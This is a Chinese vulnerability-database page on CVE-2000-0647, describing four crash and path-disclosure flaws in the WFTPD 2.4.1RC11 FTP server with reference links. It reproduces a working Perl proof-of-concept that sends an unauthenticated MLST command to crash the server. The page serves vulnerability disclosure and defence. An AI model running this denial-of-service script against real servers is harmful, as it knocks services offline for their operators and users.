WFTPD 2.4.1RC11多个漏洞

WFTPD 2.4.1RC11多个漏洞

漏洞ID 1105934 漏洞类型 输入验证
发布时间 2000-07-21 更新时间 2005-10-20
图片[1]-WFTPD 2.4.1RC11多个漏洞-安全小百科CVE编号 CVE-2000-0647
图片[2]-WFTPD 2.4.1RC11多个漏洞-安全小百科CNNVD-ID CNNVD-200007-061
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200007-061
|漏洞详情
WFTPD和WFTPDPro2.41版本存在漏洞。远程攻击者通过在登录到服务器之前执行MLST命令导致服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/1506/info
  
WFTPD versions prior to 2.4.1RC11 suffer from a number of vulnerabilities.
  
1) Issuing a STAT command while a LIST is in progress will cause the ftp server to crash.
2) If the REST command is used to write past the end of a file or to a non-existant file (with STOU, STOR, or APPE), the ftp server will crash.
3) If a transfer is in progress and a STAT command is issued, the full path and filename on the server is revealed.
4) If an MLST command is sent without first logging in with USER and PASS, the ftp server will crash.

#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC11 denial-of-service #3
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Sends an MLST command without logging in with USER and PASS first, causing
# WFTPD to crash. Note: MLST is not enabled by default, and must be for this
# to work.
#

use IO::Socket;

$host = "ftp.host.com" ;
$port = "21";
$wait = 10;

# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.n";
print "done.n";

print $socket "MLST an";

# Wait a while, just to make sure the command arrives.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}

# Finished.
close($socket);
print "nConnection closed. Finished.n"
|参考资料

来源:BID
名称:1506
链接:http://www.securityfocus.com/bid/1506
来源:BUGTRAQ
名称:20000721WFTPD/WFTPDPro2.41RC11vulnerabilities.
链接:http://archives.neohapsis.com/archives/bugtraq/2000-07/0295.html

相关推荐: Mac OS X漏洞

Mac OS X漏洞 漏洞ID 1202370 漏洞类型 未知 发布时间 2003-11-03 更新时间 2003-11-03 CVE编号 CVE-2003-0882 CNNVD-ID CNNVD-200311-005 漏洞平台 N/A CVSS评分 5.0 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享